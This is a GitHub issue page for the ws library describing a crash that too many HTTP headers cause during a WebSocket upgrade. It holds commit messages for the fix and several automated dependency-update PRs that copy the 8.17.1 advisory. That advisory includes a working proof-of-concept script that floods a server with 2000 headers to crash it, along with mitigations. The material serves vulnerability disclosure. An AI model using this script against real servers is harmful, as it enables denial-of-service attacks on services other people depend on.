Throws TypeError when there are too many HTTP headers #2230
Comments
|
Please create a minimal reproducible test case using only If the server |
|
Here is a test case to reproduce the issue using only Node.js core modules. const http = require('http');
const server = http.createServer();
server.maxHeadersCount = 1;
server.on('upgrade', function (request) {
console.log(request.headers);
});
server.listen(function () {
const { port } = server.address();
const request = http.request({
headers: {
foo: 'foo',
bar: 'bar',
baz: 'baz',
qux: 'qux',
connection: 'Upgrade',
upgrade: 'protocol'
},
host: '127.0.0.1',
port
});
request.end();
});The |
lpinca
added a commit
that referenced
this issue
Jun 15, 2024
If the number of headers exceed the `maxHeadersCount` threshold, `incomingMessage.headers.upgrade` can be `undefined`. Handle the case correctly and abort the handshake. Fixes #2230
|
See #2231. |
lpinca
added a commit
that referenced
this issue
Jun 16, 2024
It is possible that the Upgrade header is correctly received and handled (the `'upgrade'` event is emitted) without its value being returned to the user. This can happen if the number of received headers exceed the `server.maxHeadersCount` or `request.maxHeadersCount` threshold. In this case `incomingMessage.headers.upgrade` may not be set. Handle the case correctly and abort the handshake. Fixes #2230
lpinca
added a commit
that referenced
this issue
Jun 16, 2024
It is possible that the Upgrade header is correctly received and handled (the `'upgrade'` event is emitted) without its value being returned to the user. This can happen if the number of received headers exceed the `server.maxHeadersCount` or `request.maxHeadersCount` threshold. In this case `incomingMessage.headers.upgrade` may not be set. Handle the case correctly and abort the handshake. Fixes #2230
lpinca
added a commit
that referenced
this issue
Jun 16, 2024
It is possible that the Upgrade header is correctly received and handled (the `'upgrade'` event is emitted) without its value being returned to the user. This can happen if the number of received headers exceed the `server.maxHeadersCount` or `request.maxHeadersCount` threshold. In this case `incomingMessage.headers.upgrade` may not be set. Handle the case correctly and abort the handshake. Fixes #2230
lpinca
added a commit
that referenced
this issue
Jun 16, 2024
It is possible that the Upgrade header is correctly received and handled (the `'upgrade'` event is emitted) without its value being returned to the user. This can happen if the number of received headers exceed the `server.maxHeadersCount` or `request.maxHeadersCount` threshold. In this case `incomingMessage.headers.upgrade` may not be set. Handle the case correctly and abort the handshake. Fixes #2230
lpinca
added a commit
that referenced
this issue
Jun 16, 2024
It is possible that the Upgrade header is correctly received and handled (the `'upgrade'` event is emitted) without its value being returned to the user. This can happen if the number of received headers exceed the `server.maxHeadersCount` or `request.maxHeadersCount` threshold. In this case `incomingMessage.headers.upgrade` may not be set. Handle the case correctly and abort the handshake. Fixes #2230
lpinca
added a commit
that referenced
this issue
Jun 16, 2024
It is possible that the Upgrade header is correctly received and handled (the `'upgrade'` event is emitted) without its value being returned to the user. This can happen if the number of received headers exceed the `server.maxHeadersCount` or `request.maxHeadersCount` threshold. In this case `incomingMessage.headers.upgrade` may not be set. Handle the case correctly and abort the handshake. Fixes #2230
kodiakhq bot
pushed a commit
to X-oss-byte/Canary-nextjs
that referenced
this issue
Jun 17, 2024
[](https://renovatebot.com) This PR contains the following updates: | Package | Change | Age | Adoption | Passing | Confidence | |---|---|---|---|---|---| | [ws](https://github.com/websockets/ws) | [`8.17.0` -> `8.17.1`](https://renovatebot.com/diffs/npm/ws/8.17.0/8.17.1) | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | --- > [!WARNING] > Some dependencies could not be looked up. Check the Dependency Dashboard for more information. --- ### Release Notes <details> <summary>websockets/ws (ws)</summary> ### [`v8.17.1`](https://github.com/websockets/ws/releases/tag/8.17.1) [Compare Source](https://github.com/websockets/ws/compare/8.17.0...8.17.1) ### Bug fixes - Fixed a DoS vulnerability ([#​2231](https://github.com/websockets/ws/issues/2231)). A request with a number of headers exceeding the[`server.maxHeadersCount`][server.maxHeadersCount] threshold could be used to crash a ws server. ```js const http = require('http'); const WebSocket = require('ws'); const server = http.createServer(); const wss = new WebSocket.Server({ server }); server.listen(function () { const chars = "!#$%&'*+-.0123456789abcdefghijklmnopqrstuvwxyz^_`|~".split(''); const headers = {}; let count = 0; for (let i = 0; i < chars.length; i++) { if (count === 2000) break; for (let j = 0; j < chars.length; j++) { const key = chars[i] + chars[j]; headers[key] = 'x'; if (++count === 2000) break; } } headers.Connection = 'Upgrade'; headers.Upgrade = 'websocket'; headers['Sec-WebSocket-Key'] = 'dGhlIHNhbXBsZSBub25jZQ=='; headers['Sec-WebSocket-Version'] = '13'; const request = http.request({ headers: headers, host: '127.0.0.1', port: server.address().port }); request.end(); }); ``` The vulnerability was reported by [Ryan LaPointe](https://github.com/rrlapointe) in [websockets/ws#2230. In vulnerable versions of ws, the issue can be mitigated in the following ways: 1. Reduce the maximum allowed length of the request headers using the [`--max-http-header-size=size`][--max-http-header-size=size] and/or the [`maxHeaderSize`][maxHeaderSize] options so that no more headers than the `server.maxHeadersCount` limit can be sent. 2. Set `server.maxHeadersCount` to `0` so that no limit is applied. [`--max-http-header-size=size`]: https://nodejs.org/api/cli.html#--max-http-header-sizesize [`maxHeaderSize`]: https://nodejs.org/api/http.html#httpcreateserveroptions-requestlistener [`server.maxHeadersCount`]: https://nodejs.org/api/http.html#servermaxheaderscount </details> --- ### Configuration 📅 **Schedule**: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined). 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] If you want to rebase/retry this PR, check this box --- This PR has been generated by [Mend Renovate](https://www.mend.io/free-developer-tools/renovate/). View repository job log [here](https://developer.mend.io/github/X-oss-byte/Canary-nextjs).
kodiakhq bot
pushed a commit
to X-oss-byte/Nextjs
that referenced
this issue
Jun 17, 2024
[](https://renovatebot.com) This PR contains the following updates: | Package | Change | Age | Adoption | Passing | Confidence | |---|---|---|---|---|---| | [ws](https://github.com/websockets/ws) | [`8.17.0` -> `8.17.1`](https://renovatebot.com/diffs/npm/ws/8.16.0/8.17.1) | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | --- ### Release Notes <details> <summary>websockets/ws (ws)</summary> ### [`v8.17.1`](https://github.com/websockets/ws/releases/tag/8.17.1) [Compare Source](https://github.com/websockets/ws/compare/8.17.0...8.17.1) ### Bug fixes - Fixed a DoS vulnerability ([#​2231](https://github.com/websockets/ws/issues/2231)). A request with a number of headers exceeding the[`server.maxHeadersCount`][server.maxHeadersCount] threshold could be used to crash a ws server. ```js const http = require('http'); const WebSocket = require('ws'); const server = http.createServer(); const wss = new WebSocket.Server({ server }); server.listen(function () { const chars = "!#$%&'*+-.0123456789abcdefghijklmnopqrstuvwxyz^_`|~".split(''); const headers = {}; let count = 0; for (let i = 0; i < chars.length; i++) { if (count === 2000) break; for (let j = 0; j < chars.length; j++) { const key = chars[i] + chars[j]; headers[key] = 'x'; if (++count === 2000) break; } } headers.Connection = 'Upgrade'; headers.Upgrade = 'websocket'; headers['Sec-WebSocket-Key'] = 'dGhlIHNhbXBsZSBub25jZQ=='; headers['Sec-WebSocket-Version'] = '13'; const request = http.request({ headers: headers, host: '127.0.0.1', port: server.address().port }); request.end(); }); ``` The vulnerability was reported by [Ryan LaPointe](https://github.com/rrlapointe) in [websockets/ws#2230. In vulnerable versions of ws, the issue can be mitigated in the following ways: 1. Reduce the maximum allowed length of the request headers using the [`--max-http-header-size=size`][--max-http-header-size=size] and/or the [`maxHeaderSize`][maxHeaderSize] options so that no more headers than the `server.maxHeadersCount` limit can be sent. 2. Set `server.maxHeadersCount` to `0` so that no limit is applied. [`--max-http-header-size=size`]: https://nodejs.org/api/cli.html#--max-http-header-sizesize [`maxHeaderSize`]: https://nodejs.org/api/http.html#httpcreateserveroptions-requestlistener [`server.maxHeadersCount`]: https://nodejs.org/api/http.html#servermaxheaderscount ### [`v8.17.0`](https://github.com/websockets/ws/releases/tag/8.17.0) [Compare Source](https://github.com/websockets/ws/compare/8.16.0...8.17.0) ### Features - The `WebSocket` constructor now accepts the `createConnection` option ([#​2219](https://github.com/websockets/ws/issues/2219)). ### Other notable changes - The default value of the `allowSynchronousEvents` option has been changed to `true` ([#​2221](https://github.com/websockets/ws/issues/2221)). This is a breaking change in a patch release. The assumption is that the option is not widely used. </details> --- ### Configuration 📅 **Schedule**: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined). 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] If you want to rebase/retry this PR, check this box --- This PR has been generated by [Mend Renovate](https://www.mend.io/free-developer-tools/renovate/). View repository job log [here](https://developer.mend.io/github/X-oss-byte/Nextjs).
kodiakhq bot
added a commit
to weareinreach/TransMascFutures
that referenced
this issue
Jun 18, 2024
[](https://renovatebot.com) This PR contains the following updates: | Package | Type | Update | Change | OpenSSF | |---|---|---|---|---| | [@prisma/adapter-neon](https://github.com/prisma/prisma) ([source](https://github.com/prisma/prisma/tree/HEAD/packages/adapter-neon)) | dependencies | patch | [`5.15.0` -> `5.15.1`](https://renovatebot.com/diffs/npm/@prisma%2fadapter-neon/5.15.0/5.15.1) | [](https://securityscorecards.dev/viewer/?uri=github.com/prisma/prisma) | | [@prisma/client](https://www.prisma.io) ([source](https://github.com/prisma/prisma/tree/HEAD/packages/client)) | dependencies | patch | [`5.15.0` -> `5.15.1`](https://renovatebot.com/diffs/npm/@prisma%2fclient/5.15.0/5.15.1) | [](https://securityscorecards.dev/viewer/?uri=github.com/prisma/prisma) | | [@storybook/addon-a11y](https://github.com/storybookjs/storybook/tree/next/code/addons/a11y) ([source](https://github.com/storybookjs/storybook/tree/HEAD/code/addons/a11y)) | devDependencies | patch | [`8.1.9` -> `8.1.10`](https://renovatebot.com/diffs/npm/@storybook%2faddon-a11y/8.1.9/8.1.10) | [](https://securityscorecards.dev/viewer/?uri=github.com/storybookjs/storybook) | | [@storybook/addon-essentials](https://github.com/storybookjs/storybook/tree/next/code/addons/essentials) ([source](https://github.com/storybookjs/storybook/tree/HEAD/code/addons/essentials)) | devDependencies | patch | [`8.1.9` -> `8.1.10`](https://renovatebot.com/diffs/npm/@storybook%2faddon-essentials/8.1.9/8.1.10) | [](https://securityscorecards.dev/viewer/?uri=github.com/storybookjs/storybook) | | [@storybook/addon-interactions](https://github.com/storybookjs/storybook/tree/next/code/addons/interactions) ([source](https://github.com/storybookjs/storybook/tree/HEAD/code/addons/interactions)) | devDependencies | patch | [`8.1.9` -> `8.1.10`](https://renovatebot.com/diffs/npm/@storybook%2faddon-interactions/8.1.9/8.1.10) | [](https://securityscorecards.dev/viewer/?uri=github.com/storybookjs/storybook) | | [@storybook/addon-links](https://github.com/storybookjs/storybook/tree/next/code/addons/links) ([source](https://github.com/storybookjs/storybook/tree/HEAD/code/addons/links)) | devDependencies | patch | [`8.1.9` -> `8.1.10`](https://renovatebot.com/diffs/npm/@storybook%2faddon-links/8.1.9/8.1.10) | [](https://securityscorecards.dev/viewer/?uri=github.com/storybookjs/storybook) | | [@storybook/addon-viewport](https://github.com/storybookjs/storybook/tree/next/code/addons/viewport) ([source](https://github.com/storybookjs/storybook/tree/HEAD/code/addons/viewport)) | devDependencies | patch | [`8.1.9` -> `8.1.10`](https://renovatebot.com/diffs/npm/@storybook%2faddon-viewport/8.1.9/8.1.10) | [](https://securityscorecards.dev/viewer/?uri=github.com/storybookjs/storybook) | | [@storybook/blocks](https://github.com/storybookjs/storybook/tree/next/code/ui/blocks) ([source](https://github.com/storybookjs/storybook/tree/HEAD/code/ui/blocks)) | devDependencies | patch | [`8.1.9` -> `8.1.10`](https://renovatebot.com/diffs/npm/@storybook%2fblocks/8.1.9/8.1.10) | [](https://securityscorecards.dev/viewer/?uri=github.com/storybookjs/storybook) | | [@storybook/nextjs](https://github.com/storybookjs/storybook/tree/next/code/frameworks/nextjs) ([source](https://github.com/storybookjs/storybook/tree/HEAD/code/frameworks/nextjs)) | devDependencies | patch | [`8.1.9` -> `8.1.10`](https://renovatebot.com/diffs/npm/@storybook%2fnextjs/8.1.9/8.1.10) | [](https://securityscorecards.dev/viewer/?uri=github.com/storybookjs/storybook) | | [@storybook/react](https://github.com/storybookjs/storybook/tree/next/code/renderers/react) ([source](https://github.com/storybookjs/storybook/tree/HEAD/code/renderers/react)) | devDependencies | patch | [`8.1.9` -> `8.1.10`](https://renovatebot.com/diffs/npm/@storybook%2freact/8.1.9/8.1.10) | [](https://securityscorecards.dev/viewer/?uri=github.com/storybookjs/storybook) | | [@storybook/test](https://github.com/storybookjs/storybook/tree/next/code/lib/test) ([source](https://github.com/storybookjs/storybook/tree/HEAD/code/lib/test)) | dependencies | patch | [`8.1.9` -> `8.1.10`](https://renovatebot.com/diffs/npm/@storybook%2ftest/8.1.9/8.1.10) | [](https://securityscorecards.dev/viewer/?uri=github.com/storybookjs/storybook) | | [@types/node](https://github.com/DefinitelyTyped/DefinitelyTyped/tree/master/types/node) ([source](https://github.com/DefinitelyTyped/DefinitelyTyped/tree/HEAD/types/node)) | devDependencies | patch | [`20.14.2` -> `20.14.5`](https://renovatebot.com/diffs/npm/@types%2fnode/20.14.2/20.14.5) | [](https://securityscorecards.dev/viewer/?uri=github.com/DefinitelyTyped/DefinitelyTyped) | | [@typescript-eslint/eslint-plugin](https://typescript-eslint.io/packages/eslint-plugin) ([source](https://github.com/typescript-eslint/typescript-eslint/tree/HEAD/packages/eslint-plugin)) | devDependencies | patch | [`7.13.0` -> `7.13.1`](https://renovatebot.com/diffs/npm/@typescript-eslint%2feslint-plugin/7.13.0/7.13.1) | [](https://securityscorecards.dev/viewer/?uri=github.com/typescript-eslint/typescript-eslint) | | [@typescript-eslint/parser](https://typescript-eslint.io/packages/parser) ([source](https://github.com/typescript-eslint/typescript-eslint/tree/HEAD/packages/parser)) | devDependencies | patch | [`7.13.0` -> `7.13.1`](https://renovatebot.com/diffs/npm/@typescript-eslint%2fparser/7.13.0/7.13.1) | [](https://securityscorecards.dev/viewer/?uri=github.com/typescript-eslint/typescript-eslint) | | [knip](https://knip.dev) ([source](https://github.com/webpro-nl/knip/tree/HEAD/packages/knip)) | devDependencies | minor | [`5.19.0` -> `5.21.2`](https://renovatebot.com/diffs/npm/knip/5.19.0/5.21.2) | [](https://securityscorecards.dev/viewer/?uri=github.com/webpro-nl/knip) | | [nextjs-routes](https://github.com/tatethurston/nextjs-routes) | dependencies | patch | [`2.2.0` -> `2.2.1`](https://renovatebot.com/diffs/npm/nextjs-routes/2.2.0/2.2.1) | [](https://securityscorecards.dev/viewer/?uri=github.com/tatethurston/nextjs-routes) | | [pnpm](https://pnpm.io) ([source](https://github.com/pnpm/pnpm)) | packageManager | minor | [`9.3.0` -> `9.4.0`](https://renovatebot.com/diffs/npm/pnpm/9.3.0/9.4.0) | [](https://securityscorecards.dev/viewer/?uri=github.com/pnpm/pnpm) | | [prisma](https://www.prisma.io) ([source](https://github.com/prisma/prisma/tree/HEAD/packages/cli)) | devDependencies | patch | [`5.15.0` -> `5.15.1`](https://renovatebot.com/diffs/npm/prisma/5.15.0/5.15.1) | [](https://securityscorecards.dev/viewer/?uri=github.com/prisma/prisma) | | [storybook](https://github.com/storybookjs/storybook/tree/next/code/lib/cli) ([source](https://github.com/storybookjs/storybook/tree/HEAD/code/lib/cli)) | devDependencies | patch | [`8.1.9` -> `8.1.10`](https://renovatebot.com/diffs/npm/storybook/8.1.9/8.1.10) | [](https://securityscorecards.dev/viewer/?uri=github.com/storybookjs/storybook) | | [tsx](https://tsx.is) ([source](https://github.com/privatenumber/tsx)) | devDependencies | patch | [`4.15.4` -> `4.15.6`](https://renovatebot.com/diffs/npm/tsx/4.15.4/4.15.6) | [](https://securityscorecards.dev/viewer/?uri=github.com/privatenumber/tsx) | | [type-fest](https://github.com/sindresorhus/type-fest) | devDependencies | patch | [`4.20.0` -> `4.20.1`](https://renovatebot.com/diffs/npm/type-fest/4.20.0/4.20.1) | [](https://securityscorecards.dev/viewer/?uri=github.com/sindresorhus/type-fest) | | [ws](https://github.com/websockets/ws) | dependencies | patch | [`8.17.0` -> `8.17.1`](https://renovatebot.com/diffs/npm/ws/8.17.0/8.17.1) | [](https://securityscorecards.dev/viewer/?uri=github.com/websockets/ws) | --- ### Release Notes <details> <summary>prisma/prisma (@​prisma/adapter-neon)</summary> ### [`v5.15.1`](https://github.com/prisma/prisma/releases/tag/5.15.1) [Compare Source](https://github.com/prisma/prisma/compare/5.15.0...5.15.1) Today, we are issuing the `5.15.1` patch release. #### Fixes in Prisma Client - [internal error: entered unreachable code](https://github.com/prisma/prisma/issues/23407) - [Got error 'internal error: entered unreachable code' when trying to perform an upsert.](https://github.com/prisma/prisma/issues/22947) - [Prisma Client errors on SQLite with internal error: entered unreachable code when running 2 concurrent upsert ](https://github.com/prisma/prisma/issues/22725) - [`ConnectionError(Timed out during query execution.)` during seeding](https://github.com/prisma/prisma/issues/21772) - [SQLite timeouts after upgrade from prisma 2 to prisma 4](https://github.com/prisma/prisma/issues/17029) - [`ConnectionError(Timed out during query execution.)` error when using `Promise.all` for SQLite](https://github.com/prisma/prisma/issues/11789) - [Improve the error when SQLite database file is locked](https://github.com/prisma/prisma/issues/10403) - [sqlite timeout error multiple queries run one after another](https://github.com/prisma/prisma/issues/10306) - [SQLite times out during query execution when using `Promise.all()` / concurrent](https://github.com/prisma/prisma/issues/9562) - [internal error: entered unreachable code](https://github.com/prisma/prisma/issues/24511) </details> <details> <summary>storybookjs/storybook (@​storybook/addon-a11y)</summary> ### [`v8.1.10`](https://github.com/storybookjs/storybook/blob/HEAD/CHANGELOG.md#8110) [Compare Source](https://github.com/storybookjs/storybook/compare/v8.1.9...v8.1.10) - Addon-interactions: Fix deprecation warnings - [#​28250](https://github.com/storybookjs/storybook/pull/28250), thanks [@​shilman](https://github.com/shilman)! - Test: Upgrade deps of [@​storybook/test](https://github.com/storybook/test) - [#​27862](https://github.com/storybookjs/storybook/pull/27862), thanks [@​kasperpeulen](https://github.com/kasperpeulen)! </details> <details> <summary>typescript-eslint/typescript-eslint (@​typescript-eslint/eslint-plugin)</summary> ### [`v7.13.1`](https://github.com/typescript-eslint/typescript-eslint/blob/HEAD/packages/eslint-plugin/CHANGELOG.md#7131-2024-06-17) [Compare Source](https://github.com/typescript-eslint/typescript-eslint/compare/v7.13.0...v7.13.1) ##### 🩹 Fixes - **eslint-plugin:** \[prefer-readonly] refine report locations - **eslint-plugin:** \[return-await] support explicit resource management - **eslint-plugin:** \[no-unsafe-member-access] differentiate a types-error any from a true any ##### ❤️ Thank You - Kirk Waiblinger - Yukihiro Hasegawa You can read about our [versioning strategy](https://main--typescript-eslint.netlify.app/users/versioning) and [releases](https://main--typescript-eslint.netlify.app/users/releases) on our website. </details> <details> <summary>typescript-eslint/typescript-eslint (@​typescript-eslint/parser)</summary> ### [`v7.13.1`](https://github.com/typescript-eslint/typescript-eslint/blob/HEAD/packages/parser/CHANGELOG.md#7131-2024-06-17) [Compare Source](https://github.com/typescript-eslint/typescript-eslint/compare/v7.13.0...v7.13.1) This was a version bump only for parser to align it with other projects, there were no code changes. You can read about our [versioning strategy](https://main--typescript-eslint.netlify.app/users/versioning) and [releases](https://main--typescript-eslint.netlify.app/users/releases) on our website. </details> <details> <summary>webpro-nl/knip (knip)</summary> ### [`v5.21.2`](https://github.com/webpro-nl/knip/compare/5.21.1...bd77bcce5acfdd108ab54398c922eb03f07fc65f) [Compare Source](https://github.com/webpro-nl/knip/compare/5.21.1...5.21.2) ### [`v5.21.1`](https://github.com/webpro-nl/knip/releases/tag/5.21.1) [Compare Source](https://github.com/webpro-nl/knip/compare/5.21.0...5.21.1) - Fix lockfile-lint config filename ([#​683](https://github.com/webpro-nl/knip/issues/683)) ([`f5304b6`](https://github.com/webpro-nl/knip/commit/f5304b6d)) - feat: add command to ignored binaries ([#​682](https://github.com/webpro-nl/knip/issues/682)) ([`d049b6c`](https://github.com/webpro-nl/knip/commit/d049b6c4)) - Add (custom) og img for sponsors page ([`d89ec12`](https://github.com/webpro-nl/knip/commit/d89ec129)) - Rename `NOT_FOUND` to `KNIP_ADDED` workspace names ([`3a41f8e`](https://github.com/webpro-nl/knip/commit/3a41f8ec)) ### [`v5.21.0`](https://github.com/webpro-nl/knip/releases/tag/5.21.0) [Compare Source](https://github.com/webpro-nl/knip/compare/5.20.0...5.21.0) - Add webdriver-io plugin ([`7414dc1`](https://github.com/webpro-nl/knip/commit/7414dc1a)) - Update plugin docs ([`df35b9f`](https://github.com/webpro-nl/knip/commit/df35b9f4)) - Minor housekeeping ([`1422c9d`](https://github.com/webpro-nl/knip/commit/1422c9d2)) - Add size-limit plugin ([`dbd82f8`](https://github.com/webpro-nl/knip/commit/dbd82f87)) - Add lockfile-lint plugin ([`d70d0de`](https://github.com/webpro-nl/knip/commit/d70d0de7)) - Use provided name in plugin template ([`43961f9`](https://github.com/webpro-nl/knip/commit/43961f91)) - Minor housekeeping ([`c81b1a2`](https://github.com/webpro-nl/knip/commit/c81b1a23)) - Update readme with badges and stuff ([`c18fcba`](https://github.com/webpro-nl/knip/commit/c18fcba5)) - Update docs (Configuring Project Files) ([`e10ac2e`](https://github.com/webpro-nl/knip/commit/e10ac2e4)) ### [`v5.20.0`](https://github.com/webpro-nl/knip/releases/tag/5.20.0) [Compare Source](https://github.com/webpro-nl/knip/compare/5.19.0...5.20.0) - Lockfile ([`e929847`](https://github.com/webpro-nl/knip/commit/e9298477)) - Edit doc ([`5afaac4`](https://github.com/webpro-nl/knip/commit/5afaac44)) - More consistent usage of fg ([`25cbba0`](https://github.com/webpro-nl/knip/commit/25cbba0a)) - Eliminiate custom TS System instance ([#​680](https://github.com/webpro-nl/knip/issues/680)) ([`d7325c6`](https://github.com/webpro-nl/knip/commit/d7325c69)) - Go against the grain in the cypress plugin ([`ef2464d`](https://github.com/webpro-nl/knip/commit/ef2464d5)) - Remove duplicate code ([`6a17ad2`](https://github.com/webpro-nl/knip/commit/6a17ad29)) - Add simple-git-hooks plugin ([#​679](https://github.com/webpro-nl/knip/issues/679)) ([`9129af7`](https://github.com/webpro-nl/knip/commit/9129af70)) - Add missing `root` property to vitest ([#​677](https://github.com/webpro-nl/knip/issues/677)) ([`6797bf8`](https://github.com/webpro-nl/knip/commit/6797bf8d)) - Update some dependencies ([`7c9b645`](https://github.com/webpro-nl/knip/commit/7c9b6455)) - Update docs ([`1c9361f`](https://github.com/webpro-nl/knip/commit/1c9361f3)) - Make TS-style path mappings work for all files with extensions ([#​673](https://github.com/webpro-nl/knip/issues/673)) ([`e9b3e66`](https://github.com/webpro-nl/knip/commit/e9b3e669)) </details> <details> <summary>tatethurston/nextjs-routes (nextjs-routes)</summary> ### [`v2.2.1`](https://github.com/tatethurston/nextjs-routes/blob/HEAD/CHANGELOG.md#221) [Compare Source](https://github.com/tatethurston/nextjs-routes/compare/v2.2.0...v2.2.1) - Fix route generation on Windows. See [#​187](https://github.com/tatethurston/nextjs-routes/issues/187). Thanks [@​AkanoCA](https://github.com/AkanoCA)! </details> <details> <summary>pnpm/pnpm (pnpm)</summary> ### [`v9.4.0`](https://github.com/pnpm/pnpm/compare/v9.3.0...v9.4.0) [Compare Source](https://github.com/pnpm/pnpm/compare/v9.3.0...v9.4.0) </details> <details> <summary>privatenumber/tsx (tsx)</summary> ### [`v4.15.6`](https://github.com/privatenumber/tsx/releases/tag/v4.15.6) [Compare Source](https://github.com/privatenumber/tsx/compare/v4.15.5...v4.15.6) ##### Bug Fixes - minimum Node version in warning for `module.register()` ([#​592](https://github.com/privatenumber/tsx/issues/592)) ([cb27d4d](https://github.com/privatenumber/tsx/commit/cb27d4dfe7670e6cf50f09b48cbd37ac73aa064a)) *** This release is also available on: - [npm package (@​latest dist-tag)](https://www.npmjs.com/package/tsx/v/4.15.6) ### [`v4.15.5`](https://github.com/privatenumber/tsx/releases/tag/v4.15.5) [Compare Source](https://github.com/privatenumber/tsx/compare/v4.15.4...v4.15.5) ##### Bug Fixes - **cjs:** make transformers overwritable ([c22fa7d](https://github.com/privatenumber/tsx/commit/c22fa7d1a90fa34983caddda91b5c1c10e1a4b6c)) *** This release is also available on: - [npm package (@​latest dist-tag)](https://www.npmjs.com/package/tsx/v/4.15.5) </details> <details> <summary>sindresorhus/type-fest (type-fest)</summary> ### [`v4.20.1`](https://github.com/sindresorhus/type-fest/releases/tag/v4.20.1) [Compare Source](https://github.com/sindresorhus/type-fest/compare/v4.20.0...v4.20.1) - `Schema`: Fix handling of arrays ([#​887](https://github.com/sindresorhus/type-fest/issues/887)) [`c570ec2`](https://github.com/sindresorhus/type-fest/commit/c570ec2) - `Paths`: Prevent infinite recursion ([#​891](https://github.com/sindresorhus/type-fest/issues/891)) [`7d4e875`](https://github.com/sindresorhus/type-fest/commit/7d4e875) </details> <details> <summary>websockets/ws (ws)</summary> ### [`v8.17.1`](https://github.com/websockets/ws/releases/tag/8.17.1) [Compare Source](https://github.com/websockets/ws/compare/8.17.0...8.17.1) ### Bug fixes - Fixed a DoS vulnerability ([#​2231](https://github.com/websockets/ws/issues/2231)). A request with a number of headers exceeding the[`server.maxHeadersCount`][server.maxHeadersCount] threshold could be used to crash a ws server. ```js const http = require('http'); const WebSocket = require('ws'); const server = http.createServer(); const wss = new WebSocket.Server({ server }); server.listen(function () { const chars = "!#$%&'*+-.0123456789abcdefghijklmnopqrstuvwxyz^_`|~".split(''); const headers = {}; let count = 0; for (let i = 0; i < chars.length; i++) { if (count === 2000) break; for (let j = 0; j < chars.length; j++) { const key = chars[i] + chars[j]; headers[key] = 'x'; if (++count === 2000) break; } } headers.Connection = 'Upgrade'; headers.Upgrade = 'websocket'; headers['Sec-WebSocket-Key'] = 'dGhlIHNhbXBsZSBub25jZQ=='; headers['Sec-WebSocket-Version'] = '13'; const request = http.request({ headers: headers, host: '127.0.0.1', port: server.address().port }); request.end(); }); ``` The vulnerability was reported by [Ryan LaPointe](https://github.com/rrlapointe) in [websockets/ws#2230. In vulnerable versions of ws, the issue can be mitigated in the following ways: 1. Reduce the maximum allowed length of the request headers using the [`--max-http-header-size=size`][--max-http-header-size=size] and/or the [`maxHeaderSize`][maxHeaderSize] options so that no more headers than the `server.maxHeadersCount` limit can be sent. 2. Set `server.maxHeadersCount` to `0` so that no limit is applied. [`--max-http-header-size=size`]: https://nodejs.org/api/cli.html#--max-http-header-sizesize [`maxHeaderSize`]: https://nodejs.org/api/http.html#httpcreateserveroptions-requestlistener [`server.maxHeadersCount`]: https://nodejs.org/api/http.html#servermaxheaderscount </details> --- ### Configuration 📅 **Schedule**: Branch creation - "before 4am on Monday,before 4am on Thursday" (UTC), Automerge - At any time (no schedule defined). 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR is behind base branch, or you tick the rebase/retry checkbox. 👻 **Immortal**: This PR will be recreated if closed unmerged. Get [config help](https://github.com/renovatebot/renovate/discussions) if that's undesired. --- - [ ] If you want to rebase/retry this PR, check this box --- This PR has been generated by [Mend Renovate](https://www.mend.io/free-developer-tools/renovate/). View repository job log [here](https://developer.mend.io/github/weareinreach/TransMascFutures). PR-URL: #436 Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
4 tasks
Open
1 task
MarcWils
added a commit
to MarcWils/VECOZO-OpenAPI
that referenced
this issue
Jun 20, 2024
MarcWils
added a commit
to MarcWils/VECOZO-OpenAPI
that referenced
this issue
Jun 20, 2024
1 task
chinthliss
added a commit
to chinthliss/MuckWebInterface
that referenced
this issue
Jun 25, 2024
This was referenced Jul 25, 2024
v-rakeshsh
added a commit
to microsoft/accessibility-insights-action
that referenced
this issue
Jul 30, 2024
